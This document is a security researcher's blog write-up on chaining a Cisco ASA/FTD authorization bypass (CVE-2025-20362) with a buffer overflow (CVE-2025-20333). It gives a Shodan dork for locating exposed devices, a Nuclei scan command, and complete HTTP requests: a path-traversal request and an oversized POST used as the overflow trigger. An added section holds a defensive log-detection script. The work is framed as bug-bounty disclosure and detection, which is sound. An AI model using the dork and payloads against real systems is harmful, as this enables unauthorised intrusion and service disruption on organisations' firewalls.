June 16, 2026
From Medium to Critical: Chaining CVE-2025–20362 & CVE-2025–20333 in Cisco ASA/FTD Across 20+…
Peace, mercy and blessings of God be upon you.
0xDyad
What if a medium-severity vulnerability was the key to reaching a critical 9.9 vulnerability?
We are 0xDyad (OFFA & George). During our research into CVE-2025-20362 (CVSS 6.5) in Cisco ASA/FTD, we discovered that it could be chained with CVE-2025-20333 (CVSS 9.9), a classic buffer overflow vulnerability, to create a powerful attack chain.
With no public PoC, exploit, or technical write-up available, we developed our own methodology and successfully identified vulnerable deployments across 20+ global organizations, including Meta, Ferrari, and the U.S. Department of Defense, which earned us DoD Researcher of the Month recognition.
In this write-up, we'll share the technical details and exploitation methodology behind our findings.
So, grab your favorite drink and enjoy the read!
The Introduction
Our research began with a focused investigation into CVE-2025-20362, a missing authorization vulnerability (CWE-862) affecting Cisco Secure ASA and Cisco Secure FTD Software. Initially rated with a CVSS score of 6.5 (Medium), this vulnerability allows unauthenticated remote attackers to access restricted URL endpoints that are intended to be protected by authentication mechanisms.
While analyzing this vulnerability, we examined the Cisco security advisory and discovered a critical detail in the vulnerability chain: CVE-2025-20362 could be leveraged to reach and expose internal endpoints that are otherwise inaccessible without proper authentication. More importantly, we recognized that these exposed endpoints could be exploited to trigger a second, far more severe vulnerability: CVE-2025-20333.
CVE-2025-20333 is a classic buffer overflow vulnerability (CWE-120) in the same web service, rated CVSS 9.9 (Critical). However, a crucial barrier existed: without first successfully exploiting CVE-2025-20362 to bypass authentication and expose the vulnerable endpoint, CVE-2025-20333 would remain unreachable in real-world deployments.
This realization sparked our investigation: if we could develop a working exploit for this vulnerability chain, we might be able to demonstrate a complete attack scenario affecting vulnerable organizations worldwide.
The Hunt for the Exploit
That realization sparked our journey to find a working exploit. Our first step was scouring all the known repositories, forums, and security tools, looking for any public information on how to exploit these two CVEs together. We found absolutely nothing. The only resource available was a basic Nuclei template for CVE-2025-20362. It merely demonstrated unauthorized access to certain endpoints. In a real-world bug bounty context, submitting this alone almost always results in an "Informative" or "Low" severity triage, simply because there is no demonstrable impact or meaningful exploitation tied to that exposure.
We then shifted our focus to the 9.9 Critical vulnerability, CVE-2025-20333. Surprisingly, there were no public Proofs of Concept (PoCs) or detailed technical write-ups explaining how to trigger it. The only mentions we found were vague news articles and high-level security advisories from when the CVE was initially announced. The actual exploitation mechanics were completely shrouded in mystery.
Realizing we were in uncharted territory, my teammate and I decided to take matters into our own hands. We needed to study the vulnerability deeply and figure out how to chain it with the initial CVE. Knowing that the critical CVE was a classic buffer overflow, we started brainstorming how to construct a reliable exploit. We spent hours theorizing, crafting payloads, and testing numerous scenarios in our lab. At first, every single attempt failed. But we knew we were on the edge of something big.
As our research progressed, we discovered that both vulnerabilities could be combined into a practical attack chain. While we were not able to fully confirm the final path to Remote Code Execution (RCE), our analysis indicated that the chain could potentially provide a route toward RCE, significantly increasing the overall security impact beyond what either vulnerability would suggest when viewed in isolation.
This realization became the driving force behind our investigation. If we could successfully demonstrate and validate this attack chain, we would be able to show how two independently reported vulnerabilities could be transformed into a far more serious real-world threat affecting organizations worldwide.
The Breakthrough: Triggering the Buffer Overflow
Through relentless testing and analysis, we theorized that the Buffer Overflow condition was directly tied to how the server handled the Content-Length header. This led us to a new, promising hypothesis.
We decided to experiment with HTTP method manipulation. We changed the request method from GET to POST and pointed it directly at one of the sensitive endpoints we had successfully exposed using the unauthorized access from the first vulnerability (CVE-2025-20362).
The target endpoint looked like this:
GET /.../?mode=upload&path=overflow_test&server=localhost&sourceurl=payload HTTP/1.1
Discovery Methodology
At this stage, we moved on to identifying affected companies. Fortunately, the process was relatively straightforward. Any company vulnerable to the first CVE was, in most cases, also vulnerable to the second CVE.
I will now describe the Proof of Concept (PoC), as well as the methodology used to identify and verify affected targets.
The first step is to search for exposed instances using Shodan or any other search engine capable of indexing internet-facing services. The following dork can be used to identify potentially affected endpoints:
html:"/+CSCOE+/logon.html"
To search for a specific company, the following query can be used:
html:"/+CSCOE+/logon.html" ssl:"company name"
After identifying relevant results, collect and save the IP addresses associated with the target organization.
Verification Process
Next, download the Nuclei template for CVE-2025-20362 and execute it against the identified targets:
nuclei -u <target-ip> -t CVE-2025-20362.yaml
Once the target is confirmed to be affected, intercept the request associated with the endpoint identified by the Nuclei scan using Burp Suite.
Request:
POST /+CSCOU+//../+CSCOE+/files/file_action.html?mode=upload&path=foo&server=srv&sourceurl=qaz HTTP/1.1
Host: ip
Content-Type: application/x-www-form-urlencoded;boundary=ee
Content-Length: 8

aabbccdd
Response:
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
X-Frame-Options: SAMEORIGIN
Content-Length: 135

<html><body><script>alert('Failed to upload file');
location.href="/+CSCOE+/files/browse.html?code=init&path=qaz"
</script></body></html>
Modify the request method from GET to POST, then send a request containing a large payload within the request body. If the server response is significantly delayed, this indicates that the vulnerability is likely present and exploitable.
So the full exploit request looks like this:
POST /+CSCOU+//../+CSCOE+/files/file_action.html?mode=upload&path=overflow_test&server=localhost&sourceurl=payload HTTP/1.1
Host: ip/host
Content-Type: application/x-www-form-urlencoded
Content-Length: 719696

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...[719696 bytes of 'A']
At this point, the issue can be responsibly disclosed to the affected organization for remediation.
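For defenders, the two requests above give a clear pair of indicators to hunt for in logs from a reverse proxy, WAF or IDS in front of the ASA/FTD web service: the `/+CSCOU+//../+CSCOE+/` traversal that reaches `file_action.html` without a session (the CVE-2025-20362 pattern), and the same path requested with POST and an oversized body (the CVE-2025-20333 trigger the write-up describes). The following detection script is an added example and is not code from the authors or from Cisco. It goes slightly beyond the literal requests on the page by percent-decoding and normalising the path so that encoded or padded traversal variants are matched as well. The log format, the sample log lines and the 64 KiB body-size threshold are all constructed assumptions for this example; adapt the parser and threshold to your own log source.

```python
import re
from urllib.parse import urlsplit, unquote

# Indicators taken from the write-up: the +CSCOU+ -> +CSCOE+ traversal reaches
# file_action.html without authentication (CVE-2025-20362), and a POST with an
# oversized body to that endpoint is the CVE-2025-20333 trigger the authors
# describe. The body-size threshold below is an assumption chosen for this example.
TRAVERSAL_RE = re.compile(r"/\+CSCOU\+/+\.\./\+CSCOE\+/", re.IGNORECASE)
TARGET_ENDPOINT = "/+CSCOE+/files/file_action.html"
LARGE_BODY_BYTES = 64 * 1024  # assumed threshold; tune to your environment

# Constructed sample log lines in a simplified format (assumption, not Cisco syslog):
#   client method "path" status content_length
SAMPLE_LOG = """\
203.0.113.10 GET "/+CSCOE+/logon.html" 200 0
203.0.113.11 GET "/+CSCOU+//../+CSCOE+/files/file_action.html?mode=upload&path=foo&server=srv&sourceurl=qaz" 200 8
203.0.113.11 POST "/+CSCOU+//../+CSCOE+/files/file_action.html?mode=upload&path=overflow_test&server=localhost&sourceurl=payload" 200 719696
203.0.113.12 POST "/%2bCSCOU%2b//../%2bCSCOE%2b/files/file_action.html?mode=upload" 200 719696
203.0.113.13 POST "/+CSCOE+/files/file_action.html?mode=upload" 200 512
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) (?P<method>[A-Z]+) "(?P<path>[^"]*)" (?P<status>\d{3}) (?P<length>\d+)$'
)


def normalise_path(raw_path):
    """Percent-decode and collapse '..' so encoded or padded traversal variants compare equal."""
    path = unquote(urlsplit(raw_path).path)
    out = []
    for seg in path.split("/"):
        if seg == "..":
            if out:
                out.pop()
        elif seg and seg != ".":
            out.append(seg)
    return "/" + "/".join(out)


def classify_request(method, raw_path, content_length):
    """Return a finding label for one request, or None if it is not interesting.

    'auth-bypass'      : traversal through +CSCOU+ into +CSCOE+ that lands on
                         file_action.html (CVE-2025-20362 pattern)
    'overflow-attempt' : same traversal plus a POST with an oversized body
                         (CVE-2025-20333 pattern from the write-up)
    """
    decoded = unquote(raw_path)
    uses_traversal = TRAVERSAL_RE.search(decoded) is not None
    reaches_target = normalise_path(raw_path) == TARGET_ENDPOINT
    if not (uses_traversal and reaches_target):
        return None
    if method == "POST" and content_length >= LARGE_BODY_BYTES:
        return "overflow-attempt"
    return "auth-bypass"


def scan_log(text):
    """Parse log lines and return (client, label) tuples for every suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        label = classify_request(m["method"], m["path"], int(m["length"]))
        if label:
            findings.append((m["client"], label))
    return findings


if __name__ == "__main__":
    for client, label in scan_log(SAMPLE_LOG):
        print(f"{client}: {label}")
```

Run against the embedded sample, the script reports the GET traversal from 203.0.113.11 as an authorization-bypass probe, and the two large POSTs (one plain, one percent-encoded) as overflow attempts, while ignoring the ordinary logon page hit and a direct request to `file_action.html` that does not use the traversal. An `auth-bypass` hit from an unauthenticated source is already worth an alert on its own, since the write-up shows it is the precondition for the critical issue; the `overflow-attempt` label is the one to page on, alongside patching to the fixed ASA/FTD release from Cisco's advisory.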
This video provides a detailed explanation of how the exploitation chain works. Feel free to watch it and share your thoughts in the comments :).
These are some of our submitted reports across different companies, including Meta, Ferrari, and several other organizations on HackerOne. All reports are based on the same vulnerability and exploitation scenario, and all of them have been successfully triaged.
It has also been submitted to the DoD (Department of Defense) vulnerability disclosure program, where it received recognition and we were awarded "Researcher of the Month" for our findings.